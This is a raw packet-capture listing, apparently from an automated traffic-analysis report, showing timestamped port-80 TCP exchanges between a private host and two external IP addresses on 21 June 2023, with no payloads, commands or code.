                                                                                                  Jun 21, 2023 20:23:59.353595972 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353629112 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353647947 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.353647947 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.353647947 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.353647947 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.353662968 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353698015 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353730917 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353761911 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353796005 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353827953 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353859901 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353893995 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353925943 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353934050 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.353934050 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.353934050 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.353959084 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353991985 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354023933 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354058027 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354073048 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.354080915 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354114056 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354146957 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354187965 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.354187965 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.354224920 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354259014 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354290962 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354324102 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354357004 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354420900 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354453087 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354485989 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354487896 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.354487896 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.354517937 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354538918 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.354552031 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354583979 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354615927 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354649067 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354681015 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354716063 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354747057 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354754925 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.354754925 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.354754925 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.354783058 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354787111 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.354815960 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354847908 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354880095 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354912043 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354944944 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354976892 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.354988098 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.354988098 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.354988098 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.355031013 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355062962 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355093002 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355103016 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.355125904 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355149031 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355180979 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355214119 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355262041 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.355288982 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355321884 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355353117 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355381966 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355391026 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.355391026 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.355413914 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355446100 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355451107 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.355478048 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355510950 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355535030 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.355540991 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355602980 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355634928 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355639935 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.355667114 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355699062 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355741978 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355775118 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355815887 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355860949 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355864048 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.355864048 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.355864048 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.355895042 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355926037 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355956078 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.355987072 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356017113 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356049061 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356079102 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356084108 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356085062 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356085062 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356085062 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356110096 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356142044 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356173038 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356203079 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356232882 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356282949 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356306076 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356306076 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356306076 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356329918 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356364965 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356398106 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356430054 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356462955 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356494904 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356525898 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356559038 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356563091 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356563091 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356563091 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356563091 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356592894 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356626034 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356658936 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356692076 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356724024 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356756926 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356765032 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356765032 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356765032 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.356790066 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356825113 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356857061 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356889963 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356923103 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356955051 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.356985092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357012033 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357012033 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357012033 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357022047 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357048988 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357084990 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357115984 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357150078 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357182980 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357215881 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357248068 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357253075 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357254028 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357254028 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357281923 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357315063 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357348919 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357391119 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357451916 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357486963 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357518911 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357534885 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357534885 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357534885 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357534885 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357552052 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357590914 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357625008 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357659101 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357691050 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357712984 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357712984 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357723951 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357757092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357789040 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357822895 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357829094 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357855082 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357856989 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357891083 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357923031 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.357949972 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.357981920 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358015060 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358047962 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358081102 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358113050 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358120918 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.358120918 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.358135939 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358159065 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358181000 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358202934 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358234882 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358268976 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358303070 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358355045 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358385086 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358417034 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358419895 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.358419895 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.358449936 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358477116 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.358484030 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358516932 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358547926 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358581066 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358613968 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358644962 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358680964 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.358690977 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.358690977 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.358915091 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.369596004 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.369621038 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.370486975 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.372428894 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.372452021 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.372992992 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.375602961 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.375854015 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.376256943 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.376296043 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.376429081 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.376429081 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.383908033 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.383946896 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.383980989 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384047985 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384182930 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384242058 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384288073 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384310961 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.384310961 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.384319067 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384352922 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384375095 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384407997 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384440899 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384447098 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.384448051 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.384474039 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384509087 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384541035 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384572029 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384593964 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384597063 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.384597063 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.384618044 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384640932 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384661913 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384695053 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384860039 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.384891033 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384923935 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384955883 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.384988070 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385020971 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385054111 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385086060 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.385087013 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385086060 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.385127068 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.385149002 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385181904 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385214090 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385248899 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385282040 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385294914 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.385294914 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.385318041 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385380030 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385404110 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.385415077 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385449886 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385484934 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385518074 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385550022 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385550976 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.385550976 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.385582924 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385612965 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.385617971 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385679007 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385714054 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385746002 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385778904 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385788918 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.385788918 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.385894060 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.385945082 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.385978937 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386010885 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386044025 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386076927 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386081934 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.386082888 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.386110067 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386143923 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386177063 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386219025 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386265993 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386300087 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386332035 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386363983 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386380911 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.386380911 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.386380911 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.386380911 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.386398077 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386431932 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386464119 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.386464119 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386514902 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386548042 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.386579990 CEST804970445.9.74.80192.168.2.4
